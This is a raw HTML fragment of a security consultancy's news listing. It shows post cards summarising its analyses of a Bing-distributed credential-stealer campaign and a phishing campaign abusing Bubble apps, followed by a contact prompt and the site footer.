elementor-posts--thumbnail-top elementor-card-shadow-yes elementor-posts__hover-gradient load-more-align-center elementor-widget elementor-widget-posts\" data-id=\"627305a9\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;pagination_type&quot;:&quot;load_more_on_click&quot;,&quot;cards_columns&quot;:&quot;3&quot;,&quot;cards_columns_tablet&quot;:&quot;2&quot;,&quot;cards_columns_mobile&quot;:&quot;1&quot;,&quot;cards_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:35,&quot;sizes&quot;:[]},&quot;cards_row_gap_tablet_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_mobile_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;load_more_spinner&quot;:{&quot;value&quot;:&quot;fas fa-spinner&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"posts.cards\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-posts-container elementor-posts elementor-posts--skin-cards elementor-grid\" role=\"list\">\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-27679 post type-post status-publish format-standard has-post-thumbnail hentry category-forensic tag-forensik\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium size-medium wp-image-18528 lazyload\" alt=\"\" sizes=\"(max-width: 300px) 100vw, 300px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-300x200.jpg\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-768x512.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-1536x1024.jpg 1536w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/krzysztof-hepner-C1JTOq_uTpY-unsplash-2048x1365.jpg 2048w\"><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Forensic<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/\" >\n\t\t\t\tAnalysis of a credential stealer malware campaign \u2013 Part II\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>June 23, 2026 &#8211; Researchers have uncovered an evolved credential-stealing malware campaign that lures Windows users through fake software download pages appearing in Bing search results. The updated malware deploys a malicious Chrome extension disguised as &#8220;Microsoft Teams Helper,&#8221; capable of keystroke logging, real-time screen recording, cryptocurrency clipboard hijacking, and full remote code execution on the victim&#8217;s machine. <br \/> <br \/>\nAuthor: Colin Gl\u00e4tzer, Konrad Weyhing<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-ii\/\" aria-label=\"Read more about Analysis of a credential stealer malware campaign \u2013 Part II\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-27166 post type-post status-publish format-standard has-post-thumbnail hentry category-forensic tag-forensik\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-1\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium size-medium wp-image-12075 lazyload\" alt=\"\" sizes=\"(max-width: 300px) 100vw, 300px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-300x200.jpg\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-768x512.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen.jpg 1500w\"><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Forensic<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-1\/\" >\n\t\t\t\tAnalysis of a credential-stealer malware campaign \u2013 Part I\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>May 20, 2026 &#8211; In March 2026, cirosec identified an ongoing malware campaign targeting developers, IT professionals, and power users who rely on popular open-source and productivity tools. The campaign is only accessible using the Bing search engine. Once executed, the malware exfiltrates browser credential stores, cryptocurrency wallet data, authentication tokens, VPN and SSH configurations, and sensitive documents.<br \/> <br \/>\nAuthor: Colin Gl\u00e4tzer, Konrad Weyhing, Felix Friedberger<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-1\/\" aria-label=\"Read more about Analysis of a credential-stealer malware campaign \u2013 Part I\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-25815 post type-post status-publish format-standard has-post-thumbnail hentry category-forensic tag-forensik\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/abusing-bubble-io\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium size-medium wp-image-18516 lazyload\" alt=\"\" sizes=\"(max-width: 300px) 100vw, 300px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-300x200.jpg\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-768x513.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-1536x1025.jpg 1536w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-2048x1367.jpg 2048w\"><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Forensic<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/abusing-bubble-io\/\" >\n\t\t\t\tHow Atta\u00adckers Abuse Bubble\u00adapps.io to Phish German Busi\u00adnesses\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>February 25, 2026 &#8211; This post breaks down the full attack chain, from initial phishing emails to credential harvesting and remote access malware and maps out some of the infrastructure behind it.<br \/>\n<br \/>\nAuthor: Felix Friedberger<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/abusing-bubble-io\/\" aria-label=\"Read more about How Atta\u00adckers Abuse Bubble\u00adapps.io to Phish German Busi\u00adnesses\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<\/div>\n\t\t\t\t\t<span class=\"e-load-more-spinner\">\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-spinner\"><\/i>\t\t\t<\/span>\n\t\t\n\t\t\t\t<div class=\"e-load-more-anchor\" data-page=\"1\" data-max-page=\"2\" data-next-page=\"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/27679\/page\/2\/\"><\/div>\n\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t<a class=\"elementor-button elementor-size-sm\" role=\"button\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Load More<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t<\/div>\n\t\t\t\t<div class=\"e-load-more-message\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-4ce38c45 e-con-full e-flex e-con e-parent\" data-id=\"4ce38c45\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-670eaf6 elementor-widget elementor-widget-template\" data-id=\"670eaf6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<div data-elementor-type=\"section\" data-elementor-id=\"6023\" class=\"elementor elementor-6023 elementor-2968 elementor-2968\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3920b242 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3920b242\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-61cde52c\" data-id=\"61cde52c\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7eba007 elementor-widget elementor-widget-spacer\" data-id=\"7eba007\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7346d88 elementor-widget elementor-widget-heading\" data-id=\"7346d88\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Do you want to protect your systems? Feel free to get in touch with us.<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1b0432b elementor-widget elementor-widget-spacer\" data-id=\"1b0432b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-5cdf3c58 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5cdf3c58\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-40c99187\" data-id=\"40c99187\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a1d7b6a elementor-align-right elementor-widget elementor-widget-button\" data-id=\"4a1d7b6a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/cirosec.de\/en\/inquiry\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Send Enquiry<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-3b9d9ea6\" data-id=\"3b9d9ea6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7e7c4d9b elementor-widget elementor-widget-button\" data-id=\"7e7c4d9b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/cirosec.de\/en\/contact-us\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Contact Details<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-31f63a78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"31f63a78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-591f5619\" data-id=\"591f5619\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2b6b0ef0 elementor-widget elementor-widget-template\" data-id=\"2b6b0ef0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<footer data-elementor-type=\"footer\" data-elementor-id=\"6025\" class=\"elementor elementor-6025 elementor-945 elementor-945\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1e44cc2 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"1e44cc2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e9b41ce\" data-id=\"e9b41ce\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-51c0c74 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"51c0c74\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-8ac5cc6\" data-id=\"8ac5cc6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-af371ae elementor-widget elementor-widget-theme-site-logo elementor-widget-image\" data-id=\"af371ae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"theme-site-logo.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/en\/\">\n\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"626\" height=\"188\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-full size-full wp-image-5868 lazyload\" alt=\"\" sizes=\"(max-width: 626px) 100vw, 626px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png 626w, https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent-300x90.png 300w\">\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-85f2a11 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"85f2a11\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Competent IT security consulting, pentests, incident response and training<\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5731ee0 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"5731ee0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>cirosec GmbH<br \/>Ferdinand-Braun-Stra\u00dfe 4<br \/>74074 Heilbronn, Germany<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-c7c447f\" data-id=\"c7c447f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4826023 elementor-widget elementor-widget-heading\" data-id=\"4826023\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Quicklinks<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f26d479 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"f26d479\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-f26d479\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9132\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9133\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-item\">Services<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9134\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-item\">Trainings<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9139\"><a href=\"https:\/\/cirosec.de\/en\/secure-email-communication-with-cirosec\/\" class=\"elementor-item\">Secure Email Communication with cirosec<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-f26d479\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9132\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\" tabindex=\"-1\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9133\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-item\" tabindex=\"-1\">Services<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9134\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-item\" tabindex=\"-1\">Trainings<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9139\"><a href=\"https:\/\/cirosec.de\/en\/secure-email-communication-with-cirosec\/\" class=\"elementor-item\" tabindex=\"-1\">Secure Email Communication with cirosec<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-29e8304\" data-id=\"29e8304\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-14232af elementor-widget elementor-widget-heading\" data-id=\"14232af\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Social Media<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c23ea92 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"c23ea92\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-c23ea92\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-13039\"><a target=\"_blank\" href=\"https:\/\/www.instagram.com\/cirosecgmbh\" class=\"elementor-item\">Instagram<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9136\"><a target=\"_blank\" href=\"https:\/\/www.xing.com\/pages\/cirosecgmbh\" class=\"elementor-item\">Xing<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9137\"><a target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cirosec-gmbh\/\" class=\"elementor-item\">LinkedIn<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9138\"><a target=\"_blank\" href=\"https:\/\/twitter.com\/cirosec\" class=\"elementor-item\">X (Twitter)<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-21563\"><a href=\"https:\/\/infosec.exchange\/@cirosec\" class=\"elementor-item\">Mastodon<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-c23ea92\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-13039\"><a target=\"_blank\" href=\"https:\/\/www.instagram.com\/cirosecgmbh\" class=\"elementor-item\" tabindex=\"-1\">Instagram<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9136\"><a target=\"_blank\" href=\"https:\/\/www.xing.com\/pages\/cirosecgmbh\" class=\"elementor-item\" tabindex=\"-1\">Xing<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9137\"><a target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cirosec-gmbh\/\" class=\"elementor-item\" tabindex=\"-1\">LinkedIn<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9138\"><a target=\"_blank\" href=\"https:\/\/twitter.com\/cirosec\" class=\"elementor-item\" tabindex=\"-1\">X (Twitter)<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-21563\"><a href=\"https:\/\/infosec.exchange\/@cirosec\" class=\"elementor-item\" tabindex=\"-1\">Mastodon<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-871a164\" data-id=\"871a164\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a46aa52 elementor-widget elementor-widget-heading\" data-id=\"a46aa52\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Legal<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-50e6031 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"50e6031\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; 